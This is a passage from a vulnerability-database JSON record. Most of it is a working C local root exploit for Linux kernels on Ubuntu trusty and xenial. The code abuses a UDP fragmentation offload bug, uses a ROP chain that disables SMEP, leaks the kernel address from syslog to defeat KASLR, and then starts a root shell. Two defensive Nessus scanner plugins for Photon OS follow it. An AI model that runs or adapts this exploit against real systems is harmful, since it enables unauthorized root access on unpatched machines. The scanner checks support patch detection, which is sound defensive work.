0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-56-generic\", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },\r\n\t{ \"xenial\", \"4.8.0-58-generic\", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },\r\n};\r\n\r\n// Used to get root privileges.\r\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\r\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\r\n\r\n// Used when ENABLE_SMEP_BYPASS is used.\r\n// - xchg eax, esp ; ret\r\n// - pop rdi ; ret\r\n// - mov dword ptr [rdi], eax ; ret\r\n// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret\r\n// - neg rax ; ret\r\n// - pop rcx ; ret \r\n// - or rax, rcx ; ret\r\n// - xchg eax, edi ; ret\r\n// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret\r\n// - jmp rcx\r\n#define XCHG_EAX_ESP_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)\r\n#define POP_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rdi_ret)\r\n#define MOV_DWORD_PTR_RDI_EAX_RET\t(KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)\r\n#define MOV_RAX_CR4_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)\r\n#define NEG_RAX_RET\t\t\t(KERNEL_BASE + kernels[kernel].neg_rax_ret)\r\n#define POP_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].pop_rcx_ret)\r\n#define OR_RAX_RCX_RET\t\t\t(KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)\r\n#define XCHG_EAX_EDI_RET\t\t(KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)\r\n#define MOV_CR4_RDI_RET\t\t\t(KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)\r\n#define JMP_RCX\t\t\t\t(KERNEL_BASE + kernels[kernel].jmp_rcx)\r\n\r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\r\n\r\ntypedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);\r\n\r\nvoid get_root(void) {\r\n\t((_commit_creds)(COMMIT_CREDS))(\r\n\t ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *\r\n\r\nuint64_t saved_esp;\r\n\r\n// Unfortunately GCC does not support `__atribute__((naked))` on x86, which\r\n// can be used to omit a function's prologue, so I had to use this weird\r\n// wrapper hack as a workaround. Note: Clang does support it, which means it\r\n// has better support of GCC attributes than GCC itself. Funny.\r\nvoid wrapper() {\r\n\tasm volatile (\"\t\t\t\t\t\\n\\\r\n\tpayload:\t\t\t\t\t\\n\\\r\n\t\tmovq %%rbp, %%rax\t\t\t\\n\\\r\n\t\tmovq $0xffffffff00000000, %%rdx\t\t\\n\\\r\n\t\tandq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %0, %%rdx\t\t\t\t\\n\\\r\n\t\taddq %%rdx, %%rax\t\t\t\\n\\\r\n\t\tmovq %%rax, %%rsp\t\t\t\\n\\\r\n\t\tcall get_root\t\t\t\t\\n\\\r\n\t\tret\t\t\t\t\t\\n\\\r\n\t\" : : \"m\"(saved_esp) : );\r\n}\r\n\r\nvoid payload();\r\n\r\n#define CHAIN_SAVE_ESP\t\t\t\t\\\r\n\t*stack++ = POP_RDI_RET;\t\t\t\\\r\n\t*stack++ = (uint64_t)&saved_esp;\t\\\r\n\t*stack++ = MOV_DWORD_PTR_RDI_EAX_RET;\r\n\r\n#define SMEP_MASK 0x100000\r\n\r\n#define CHAIN_DISABLE_SMEP\t\t\t\\\r\n\t*stack++ = MOV_RAX_CR4_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = POP_RCX_RET;\t\t\t\\\r\n\t*stack++ = SMEP_MASK;\t\t\t\\\r\n\t*stack++ = OR_RAX_RCX_RET;\t\t\\\r\n\t*stack++ = NEG_RAX_RET;\t\t\t\\\r\n\t*stack++ = XCHG_EAX_EDI_RET;\t\t\\\r\n\t*stack++ = MOV_CR4_RDI_RET;\r\n\r\n#define CHAIN_JMP_PAYLOAD \\\r\n\t*stack++ = POP_RCX_RET; \\\r\n\t*stack++ = (uint64_t)&payload; \\\r\n\t*stack++ = JMP_RCX;\r\n\r\nvoid mmap_stack() {\r\n\tuint64_t stack_aligned, stack_addr;\r\n\tint page_size, stack_size, stack_offset;\r\n\tuint64_t* stack;\r\n\r\n\tpage_size = getpagesize();\r\n\r\n\tstack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);\r\n\tstack_addr = stack_aligned - page_size * 4;\r\n\tstack_size = page_size * 8;\r\n\tstack_offset = XCHG_EAX_ESP_RET % page_size;\r\n\r\n\tstack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);\r\n\tif (stack == MAP_FAILED || stack != (void*)stack_addr) {\r\n\t\tperror(\"[-] mmap()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstack = (uint64_t*)((char*)stack_aligned + stack_offset);\r\n\r\n\tCHAIN_SAVE_ESP;\r\n\tCHAIN_DISABLE_SMEP;\r\n\tCHAIN_JMP_PAYLOAD;\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nvoid mmap_syslog(char** buffer, int* size) {\r\n\t*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n\tif (*size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\t*size = (*size / getpagesize() + 1) * getpagesize();\r\n\t*buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n\t\t\t\t MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n\t*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n\tif (*size == -1) {\r\n\t\tperror(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (end = start; substr[end] != '-'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xffffffffff000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n\tconst char* needle1 = \"Freeing unused\";\r\n\tchar* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle1);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint start = 0;\r\n\tint end = 0;\r\n\tfor (start = 0; substr[start] != '-'; start++);\r\n\tfor (end = start; substr[end] != '\\n'; end++);\r\n\r\n\tconst char* needle2 = \"ffffff\";\r\n\tsubstr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n\tif (substr == NULL) {\r\n\t\tfprintf(stderr, \"[-] substring '%s' not found in syslog\\n\", needle2);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tchar* endptr = &substr[16];\r\n\tunsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n\tr &= 0xfffffffffff00000ul;\r\n\tr -= 0x1000000ul;\r\n\r\n\treturn r;\r\n}\r\n\r\nunsigned long get_kernel_addr() {\r\n\tchar* syslog;\r\n\tint size;\r\n\tmmap_syslog(&syslog, &size);\r\n\r\n\tif (strcmp(\"trusty\", kernels[kernel].distro) == 0 &&\r\n\t strncmp(\"4.4.0\", kernels[kernel].version, 5) == 0)\r\n\t\treturn get_kernel_addr_trusty(syslog, size);\r\n\tif (strcmp(\"xenial\", kernels[kernel].distro) == 0 &&\r\n\t strncmp(\"4.8.0\", kernels[kernel].version, 5) == 0)\r\n\t\treturn get_kernel_addr_xenial(syslog, size);\r\n\r\n\tprintf(\"[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\r\n\r\nstruct ubuf_info {\r\n\tuint64_t callback;\t// void (*callback)(struct ubuf_info *, bool)\r\n\tuint64_t ctx;\t\t// void *\r\n\tuint64_t desc;\t\t// unsigned long\r\n};\r\n\r\nstruct skb_shared_info {\r\n\tuint8_t nr_frags;\t// unsigned char\r\n\tuint8_t tx_flags;\t// __u8\r\n\tuint16_t gso_size;\t// unsigned short\r\n\tuint16_t gso_segs;\t// unsigned short\r\n\tuint16_t gso_type;\t// unsigned short\r\n\tuint64_t frag_list;\t// struct sk_buff *\r\n\tuint64_t hwtstamps;\t// struct skb_shared_hwtstamps\r\n\tuint32_t tskey;\t\t// u32\r\n\tuint32_t ip6_frag_id;\t// __be32\r\n\tuint32_t dataref;\t// atomic_t\r\n\tuint64_t destructor_arg; // void *\r\n\tuint8_t frags[16][17];\t// skb_frag_t frags[MAX_SKB_FRAGS];\r\n};\r\n\r\nstruct ubuf_info ui;\r\n\r\nvoid init_skb_buffer(char* buffer, unsigned long func) {\r\n\tstruct skb_shared_info* ssi = (struct skb_shared_info*)buffer;\r\n\tmemset(ssi, 0, sizeof(*ssi));\r\n\r\n\tssi->tx_flags = 0xff;\r\n\tssi->destructor_arg = (uint64_t)&ui;\r\n\tssi->nr_frags = 0;\r\n\tssi->frag_list = 0;\r\n\r\n\tui.callback = func;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\n#define SHINFO_OFFSET 3164\r\n\r\nvoid oob_execute(unsigned long payload) {\r\n\tchar buffer[4096];\r\n\tmemset(&buffer[0], 0x42, 4096);\r\n\tinit_skb_buffer(&buffer[SHINFO_OFFSET], payload);\r\n\r\n\tint s = socket(PF_INET, SOCK_DGRAM, 0);\r\n\tif (s == -1) {\r\n\t\tperror(\"[-] socket()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tstruct sockaddr_in addr;\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(8000);\r\n\taddr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\r\n\r\n\tif (connect(s, (void*)&addr, sizeof(addr))) {\r\n\t\tperror(\"[-] connect()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint size = SHINFO_OFFSET + sizeof(struct skb_shared_info);\r\n\tint rv = send(s, buffer, size, MSG_MORE);\r\n\tif (rv != size) {\r\n\t\tperror(\"[-] send()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tint val = 1;\r\n\trv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));\r\n\tif (rv != 0) {\r\n\t\tperror(\"[-] setsockopt(SO_NO_CHECK)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsend(s, buffer, 1, 0);\r\n\r\n\tclose(s);\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\n#define CHUNK_SIZE 1024\r\n\r\nint read_file(const char* file, char* buffer, int max_length) {\r\n\tint f = open(file, O_RDONLY);\r\n\tif (f == -1)\r\n\t\treturn -1;\r\n\tint bytes_read = 0;\r\n\twhile (true) {\r\n\t\tint bytes_to_read = CHUNK_SIZE;\r\n\t\tif (bytes_to_read > max_length - bytes_read)\r\n\t\t\tbytes_to_read = max_length - bytes_read;\r\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\r\n\t\tif (rv == -1)\r\n\t\t\treturn -1;\r\n\t\tbytes_read += rv;\r\n\t\tif (rv == 0)\r\n\t\t\treturn bytes_read;\r\n\t}\r\n}\r\n\r\n#define LSB_RELEASE_LENGTH 1024\r\n\r\nvoid get_distro_codename(char* output, int max_length) {\r\n\tchar buffer[LSB_RELEASE_LENGTH];\r\n\tint length = read_file(\"/etc/lsb-release\", &buffer[0], LSB_RELEASE_LENGTH);\r\n\tif (length == -1) {\r\n\t\tperror(\"[-] open/read(/etc/lsb-release)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tconst char *needle = \"DISTRIB_CODENAME=\";\r\n\tint needle_length = strlen(needle);\r\n\tchar* found = memmem(&buffer[0], length, needle, needle_length);\r\n\tif (found == NULL) {\r\n\t\tprintf(\"[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint i;\r\n\tfor (i = 0; found[needle_length + i] != '\\n'; i++) {\r\n\t\tassert(i < max_length);\r\n\t\tassert((found - &buffer[0]) + needle_length + i < length);\r\n\t\toutput[i] = found[needle_length + i];\r\n\t}\r\n}\r\n\r\nvoid get_kernel_version(char* output, int max_length) {\r\n\tstruct utsname u;\r\n\tint rv = uname(&u);\r\n\tif (rv != 0) {\r\n\t\tperror(\"[-] uname())\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tassert(strlen(u.release) <= max_length);\r\n\tstrcpy(&output[0], u.release);\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\n#define DISTRO_CODENAME_LENGTH 32\r\n#define KERNEL_VERSION_LENGTH 32\r\n\r\nvoid detect_versions() {\r\n\tchar codename[DISTRO_CODENAME_LENGTH];\r\n\tchar version[KERNEL_VERSION_LENGTH];\r\n\r\n\tget_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);\r\n\tget_kernel_version(&version[0], KERNEL_VERSION_LENGTH);\r\n\r\n\tint i;\r\n\tfor (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n\t\tif (strcmp(&codename[0], kernels[i].distro) == 0 &&\r\n\t\t strcmp(&version[0], kernels[i].version) == 0) {\r\n\t\t\tprintf(\"[.] kernel version '%s' detected\\n\", kernels[i].version);\r\n\t\t\tkernel = i;\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\r\n\tprintf(\"[-] kernel version not recognized\\n\");\r\n\texit(EXIT_FAILURE);\r\n}\r\n\r\n#define PROC_CPUINFO_LENGTH 4096\r\n\r\n// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP\r\nint smap_smep_enabled() {\r\n\tchar buffer[PROC_CPUINFO_LENGTH];\r\n\tint length = read_file(\"/proc/cpuinfo\", &buffer[0], PROC_CPUINFO_LENGTH);\r\n\tif (length == -1) {\r\n\t\tperror(\"[-] open/read(/proc/cpuinfo)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tint rv = 0;\r\n\tchar* found = memmem(&buffer[0], length, \"smep\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 1;\r\n\tfound = memmem(&buffer[0], length, \"smap\", 4);\r\n\tif (found != NULL)\r\n\t\trv += 2;\r\n\treturn rv;\r\n}\r\n\r\nvoid check_smep_smap() {\r\n\tint rv = smap_smep_enabled();\r\n\tif (rv >= 2) {\r\n\t\tprintf(\"[-] SMAP detected, no bypass available\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#if !ENABLE_SMEP_BYPASS\r\n\tif (rv >= 1) {\r\n\t\tprintf(\"[-] SMEP detected, use ENABLE_SMEP_BYPASS\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n#endif\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nstatic bool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n\tif (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tprintf(\"[!] unprivileged user namespaces are not available\\n\");\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (unshare(CLONE_NEWNET) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tperror(\"[-] sched_setaffinity()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo mtu 1500\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo mtu 1500)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo up)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid exec_shell() {\r\n\tchar* shell = \"/bin/bash\";\r\n\tchar* args[] = {shell, \"-i\", NULL};\r\n\texecve(shell, args, NULL);\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tprintf(\"[.] checking if we got root\\n\");\r\n\tif (!is_root()) {\r\n\t\tprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\tprintf(\"[+] got r00t ^_^\\n\");\r\n\texec_shell();\r\n}\r\n\r\nint main(int argc, char** argv) {\r\n\tprintf(\"[.] starting\\n\");\r\n\r\n\tprintf(\"[.] checking distro and kernel versions\\n\");\r\n\tdetect_versions();\r\n\tprintf(\"[~] done, versions looks good\\n\");\r\n\r\n\tprintf(\"[.] checking SMEP and SMAP\\n\");\r\n\tcheck_smep_smap();\r\n\tprintf(\"[~] done, looks good\\n\");\r\n\r\n\tprintf(\"[.] setting up namespace sandbox\\n\");\r\n\tsetup_sandbox();\r\n\tprintf(\"[~] done, namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\r\n\tprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\r\n\r\n\tunsigned long payload = (unsigned long)&get_root;\r\n\r\n#if ENABLE_SMEP_BYPASS\r\n\tprintf(\"[.] SMEP bypass enabled, mmapping fake stack\\n\");\r\n\tmmap_stack();\r\n\tpayload = XCHG_EAX_ESP_RET;\r\n\tprintf(\"[~] done, fake stack mmapped\\n\");\r\n#endif\r\n\r\n\tprintf(\"[.] executing payload %lx\\n\", payload);\r\n\toob_execute(payload);\r\n\tprintf(\"[~] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96343", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-07-01T00:51:37", "bulletinFamily": "scanner", "description": "An update of the linux package has been released.", "modified": "2020-07-02T00:00:00", "id": "PHOTONOS_PHSA-2017-0043_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121754", "published": "2019-02-07T00:00:00", "title": "Photon OS 2.0: Linux PHSA-2017-0043", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0043. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121754);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\n \"CVE-2017-12188\",\n \"CVE-2017-15265\",\n \"CVE-2017-15649\",\n \"CVE-2017-15951\"\n );\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2017-0043\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-1.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15951\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-api-headers-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-oprofile-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.60-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.60-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-08T12:48:12", "bulletinFamily": "scanner", "description": "An update of [linux] packages for PhotonOS has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2017-0043.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111892", "published": "2018-08-17T00:00:00", "title": "Photon OS 2.0: Linux PHSA-2017-0043 (deprecated)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0043. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111892);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\n \"CVE-2017-12188\",\n \"CVE-2017-15265\",\n \"CVE-2017-15649\",\n \"CVE-2017-15951\"\n );\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2017-0043 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n 